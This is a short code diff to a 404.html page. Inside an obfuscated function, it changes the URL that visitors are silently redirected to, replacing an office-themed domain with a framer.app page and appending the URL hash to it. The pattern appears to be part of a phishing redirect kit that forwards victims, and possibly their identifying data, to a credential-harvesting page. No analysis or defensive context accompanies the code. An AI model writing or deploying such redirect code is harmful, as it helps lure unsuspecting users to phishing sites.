--- a/404.html
+++ b/404.html
@@ -167,7 +167,7 @@ function UXFzRuIRKj() {
   }
   
   // Redirect to the target URL with the cleaned hash appended
-  window.location.href = "https://office.newinfodaily.info/pEFovGPp" + hash;
+  window.location.href = "https://warm-variations-607102.framer.app/" + hash;
 }
 
 function YkFLlYvpMd(){
